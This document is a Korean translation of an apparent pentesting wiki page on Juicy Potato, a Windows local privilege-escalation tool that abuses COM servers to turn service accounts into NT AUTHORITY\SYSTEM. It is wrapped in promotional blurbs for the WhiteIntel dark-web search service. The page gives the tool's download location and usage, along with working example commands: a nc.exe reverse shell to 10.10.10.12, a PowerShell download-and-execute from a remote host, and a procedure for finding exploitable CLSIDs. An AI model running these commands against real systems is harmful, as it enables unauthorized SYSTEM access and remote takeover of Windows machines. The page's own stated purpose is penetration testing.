WhiteIntel

WhiteIntel은 다크 웹을 통해 무료 기능을 제공하는 검색 엔진으로, 회사나 그 고객이 스틸러 악성 소프트웨어에 의해 침해되었는지 확인할 수 있습니다.

WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.

그들의 웹사이트를 확인하고 무료로 엔진을 시험해 볼 수 있습니다:

Juicy Potato (황금 권한 남용)

_RottenPotatoNG_의 달콤한 버전으로, Windows 서비스 계정에서 NT AUTHORITY\SYSTEM으로의 로컬 권한 상승 도구입니다.

https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts에서 juicypotato를 다운로드할 수 있습니다.

요약

juicy-potato Readme에서:

RottenPotatoNG 및 그 변형은 BITS 서비스를 기반으로 한 권한 상승 체인을 활용하며, 127.0.0.1:6666에서 MiTM 리스너를 가지고 있고 SeImpersonate 또는 SeAssignPrimaryToken 권한이 있는 경우입니다. Windows 빌드 검토 중에 BITS가 의도적으로 비활성화되었고 포트 6666이 사용 중인 것을 발견했습니다.

RottenPotatoNG을 무장화하기로 결정했습니다: Juicy Potato를 만나보세요.

이론을 보려면 Rotten Potato - 서비스 계정에서 SYSTEM으로의 권한 상승을 참조하고 링크 및 참조 사슬을 따르세요.

BITS 이외에도 현재 사용자(일반적으로 임펄슨 권한을 가진 "서비스 사용자")에 의해 인스턴스화될 수 있는 여러 COM 서버를 남용할 수 있다는 것을 발견했습니다. 그들은 단지:

1. 현재 사용자(일반적으로 임펄슨 권한을 가진 "서비스 사용자")에 의해 인스턴스화될 수 있어야 합니다.

2. IMarshal 인터페이스를 구현해야 합니다.

3. 슈퍼 유저(SYSTEM, 관리자, ...)로 실행되어야 합니다.

일부 테스트를 거친 후, 여러 Windows 버전에서 흥미로운 CLSID 목록을 획득하고 테스트했습니다.

Juicy details

JuicyPotato를 사용하면 다음을 수행할 수 있습니다:

• 대상 CLSID 원하는 CLSID를 선택하세요. 여기 에서 OS별로 정리된 목록을 찾을 수 있습니다.

• COM Listening port 하드코딩된 6666 대신 선호하는 COM Listening 포트를 정의하세요

• COM Listening IP address 서버를 원하는 IP에 바인딩하세요

• 프로세스 생성 모드 임펄슨된 사용자의 권한에 따라 다음 중 선택할 수 있습니다:

• CreateProcessWithToken (SeImpersonate 필요)

• CreateProcessAsUser (SeAssignPrimaryToken 필요)

• both

• 시작할 프로세스 악용이 성공하면 실행할 실행 파일 또는 스크립트

• 프로세스 인수 시작된 프로세스 인수를 사용자 정의하세요

• RPC 서버 주소 외부 RPC 서버에 인증할 수 있는 은밀한 방법

• RPC 서버 포트 외부 서버에 인증하려는 경우 유용하며 방화벽이 포트 135를 차단하는 경우...

• TEST 모드 주로 테스트 목적으로, 즉 CLSID를 테스트합니다. DCOM을 생성하고 토큰의 사용자를 출력합니다. 테스트를 위해 여기를 참조하세요

사용법

T:\>JuicyPotato.exe
JuicyPotato v0.1

Mandatory args:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port


Optional args:
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)

최종 결론

주이시 포테이토 Readme:

만약 사용자가 SeImpersonate 또는 SeAssignPrimaryToken 권한을 가지고 있다면 당신은 SYSTEM 입니다.

모든 이러한 COM 서버의 남용을 방지하는 것은 거의 불가능합니다. DCOMCNFG를 통해 이러한 객체의 권한을 수정할 수 있지만, 행운을 빕니다. 이것은 도전적일 것입니다.

실제 해결책은 * SERVICE 계정 아래에서 실행되는 민감한 계정 및 응용 프로그램을 보호하는 것입니다. DCOM을 중지하면 이 취약점을 억제할 수 있지만, 기본 OS에 심각한 영향을 줄 수 있습니다.

출처: http://ohpe.it/juicy-potato/

예시

참고: CLSID 목록을 시도하려면 이 페이지를 방문하십시오.

nc.exe 역쉘 얻기

c:\Users\Public>JuicyPotato -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe 10.10.10.12 443" -t *

Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

c:\Users\Public>

파워셸 역전

.\jp.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8080/ipst.ps1')" -t *

새 CMD 창 열기 (RDP 액세스가 있는 경우)

CLSID 문제

대부분 JuicyPotato가 사용하는 기본 CLSID는 작동하지 않을 수 있으며 exploit이 실패할 수 있습니다. 일반적으로 작동하는 CLSID를 찾기 위해 여러 번 시도해야 합니다. 특정 운영 체제에 대해 시도할 CLSID 목록을 얻으려면 다음 페이지를 방문해야 합니다:

CLSIDs 확인

먼저, juicypotato.exe 이외의 몇 가지 실행 파일이 필요합니다.

Join-Object.ps1를 다운로드하여 PS 세션에 로드하고 GetCLSID.ps1를 다운로드하고 실행하세요. 해당 스크립트는 테스트할 가능한 CLSID 목록을 생성합니다.

그런 다음 test_clsid.bat (CLSID 목록 및 juicypotato 실행 파일 경로를 변경)을 다운로드하고 실행하세요. 모든 CLSID를 시도하기 시작하고, 포트 번호가 변경되면 CLSID가 작동한 것을 의미합니다.

-c 매개변수를 사용하여 작동하는 CLSID를 확인하세요.

참고 자료

• https://github.com/ohpe/juicy-potato/blob/master/README.md

WhiteIntel

WhiteIntel은 다크 웹을 기반으로 하는 검색 엔진으로, 회사나 그 고객이 스틸러 악성 코드에 의해 침해를 당했는지 무료로 확인할 수 있는 기능을 제공합니다.

WhiteIntel의 주요 목표는 정보 탈취 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.

그들의 웹사이트를 방문하여 무료로 엔진을 시도해 볼 수 있습니다: